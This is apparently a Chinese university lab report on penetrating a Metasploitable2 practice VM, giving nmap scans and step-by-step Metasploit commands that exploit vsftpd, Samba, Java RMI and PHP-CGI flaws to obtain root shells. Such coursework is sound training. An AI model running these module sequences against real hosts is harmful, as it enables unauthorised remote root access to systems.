当前位置: 首页 > news >正文

20232418 2025-2026-1 《网络与系统攻防技术》实验六实验报告

20232418 2025-2026-1 《网络与系统攻防技术》实验六实验报告

1.实验内容

1.1发现Metasploitable2靶机,掌握metasploit、nmap的用法。

1.2利用Vsftpd源码包后门漏洞。

1.3利用SambaMS-RPC Shell命令注入漏洞。

1.4利用Java RMI SERVER命令执行漏洞

1.5利用PHP CGI参数执行注入漏洞.

2.实验要求

2.1掌握metasploit、nmap的用法。

2.2学习前期渗透的方法。

2.3利用4个漏洞,实现对靶机的攻击。

3.实验过程

3.1 前期渗透

3.1.1 在靶机中使用ipconfig得到ip地址为192.168.31.135.

image

在kali中打开msfconsole,输入以下命令。
search arp_sweep
use 0
set RHOSTS 192.168.31.0/24
run
image

在命令行中输入nmap -p 1-2048 192.168.31.135查看靶机开放的端口
image

在命令行中输入nmap -script=vuln 192.168.31.135对靶机的漏洞进行扫描
image
image
image
端口情况:共扫描了 1000 个 TCP 端口,其中显示开放的端口有 21/tcp(ftp)、22/tcp(ssh)、23/tcp(telnet)等,977 个端口处于关闭(reset)状态。
发现21端口有vsFTPd漏洞,vsFTPd 2.3.4 版本存在后门,通过该后门可执行系统命令,扫描结果中执行id命令显示获取到了uid=0(root) gid=0(root)权限(即 root 权限)。
80端口存在Slowloris 拒绝服务漏洞,Slowloris 是一种针对 Web 服务器的 DOS 攻击技术,利用 HTTP 协议的特性消耗服务器连接资源。HTTP TRACE 方法的启用则增加了客户端信息泄露的风险,这些漏洞结合起来会严重影响 Web 服务的可用性与安全性。
1099端口有RMI registry default configuration remote code execution漏洞,rmiregistry是其注册表服务端口。该漏洞因配置不当,允许攻击者通过加载恶意类文件执行任意代码,对服务器权限控制和数据安全威胁极大。

3.2 Vsftpd源码包后门漏洞(21端口)

在msfconsole中输入以下命令。
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.31.135
run
再输入uname -a,pwd,id命令,可以看到已经获取靶机的shell,攻击成功
image

3.3 SambaMS-RPC Shell命令注入漏洞(端口139)

在msfconsole中输入以下命令。
use exploit/multi/samba/usermap_script
set RHOST 192.168.31.135
exploit
再输入uname -a命令,可以看到已经获取靶机的shell,攻击成功
image

3.4Java RMI SERVER命令执行漏洞(1099端口)

在前期渗透中已经得知1099端口开放,在msfconsole中输入以下命令。
use exploit/multi/misc/java_rmi_server
set RHOST 192.168.31.135
exploit
shell
输入命令whoami,得到结果root,说明攻击成功。
image

3.5PHP CGI参数执行注入漏洞(80端口)

在msfconsole中输入以下命令。
use exploit/multi/http/php_cgi_arg_injection
set RHOST 192.168.31.135
exploit
shell
可以执行命令,说明攻击成功。
image

4.问题及解决方案

问题一:初始使用arp_sweep扫描时,因误输入网段192.168.31.0/24,未检测到目标靶机192.168.31.135。
解决方案:核对靶机ifconfig输出的正确 IP 网段,重新设置RHOSTS 192.168.31.0/24,成功扫描到靶机在线状态。
问题二:首次使用exploit/multi/samba/usermap_script时,未设置LHOST为攻击机IP,导致漏洞利用完成但未建立shell会话。
解决方案:通过set LHOST 192.168.31.197指定攻击机本地IP,重新执行exploit,成功建立反向TCP连接并获取shell。

5.学习感悟、思考等

本次实验让我完整掌握“信息收集-漏洞利用-权限获取”渗透流程,熟练运用metasploit与nmap工具。从定位靶机IP、扫描端口漏洞,到利用Vsftpd、Samba等4类漏洞获取权限,每步都需精准配置参数,如Samba攻击中修正LHOST才成功建会话,让我深知渗透测试的严谨性。 实验也暴露靶机“未更新系统、默认配置不安全”的典型隐患,如2011年的Vsftpd漏洞仍可利用,印证“系统防护需及时打补丁、关无用端口”的重要性。后续我会深入学习免杀技术,同时从防御视角思考漏洞防护策略,建立“攻防兼备”思维,持续提升网络安全实操与认知能力。

http://www.jsqmd.com/news/45759/

相关文章:

  • 恒利泰H3-MABA-011118国产替代
  • oeasy玩py106 列表_删除_del_索引元素_切片
  • 【2025/11】GitHub 本月热度排名前十的开源 Java 项目
  • “规则引擎”还是“AI驱动”?客服机器人技术路线的深度对比与选型指南
  • 吴恩达深度学习课程二: 改善深层神经网络 第三周:超参数调整,批量标准化和编程框架(五)框架演示
  • Pandoc Markdown 转 Word
  • 探索性测试:理论根基、实践精髓与未来趋势——精细解析核心原理、实操策略与多元化应用影响
  • 184天 横向移动
  • P11958 「ZHQOI R1」划分
  • Java初尝试:电梯调度迭代开发
  • 推荐几家烘箱厂家:国内优质供应商实力盘点
  • 2025年 11月 上海网站建设与小程序一体化搭建方案 甄选推荐
  • 2025 年湖南无人机培训机构精选:专业资质、实战教学与就业保障全覆盖!
  • 2025年啤酒设备生产厂家权威推荐榜单:啤酒设备厂家/精酿啤酒设备厂家/精酿啤酒厂设备源头厂家精选
  • java---gradle
  • 2025年行业内评价高的管材品牌推荐,管材源头厂家深度剖析,品牌全面评测,助力家装水管材/市政管材/市政管道/PVC管道/排水管明智之选
  • 工业级主板:宽温宽压加持,24小时不间断运行的工控核心
  • MapV-Three地图检索服务:三个API搞定90%的搜索需求
  • 2025最新推荐!云南旅游旅行社口碑排行榜,权威榜单助选云南旅游服务机构
  • 元宇宙与医疗健康的深度融合:重构诊疗、培训与健康管理新生态 - 指南
  • 详细介绍:python pytest 学习笔记 Day02
  • 2025云南冻品批发供应商最新TOP5权威推荐 餐饮店优质冻品源头厂家、烧烤食材品牌选购指南
  • 赛后总结---Codeforces Round 1064 (Div. 2)(虚拟参赛)
  • 低功耗抗干扰液晶驱动工控仪表段码驱动显示IC VK2C21BA LCD驱动原厂
  • 我们的多商户在线客服系统:支持对接多商户商城
  • 04 opencv必知必会基础
  • 如果idea -java 编译内存不够修改这个地方
  • 四川评价高的网站建设公司哪家好,新闻发布/抖音推广/网站建设/小红书推广/快手代运营/GEO优化公司推荐排行榜
  • 【完整版】Grok 4.1全面官方解析:功能详解+API调用+在线使用入口
  • [豪の算法奇妙冒险] 代码随想录算法训练营第二天 | 209-长度最小的子数组、59-螺旋矩阵II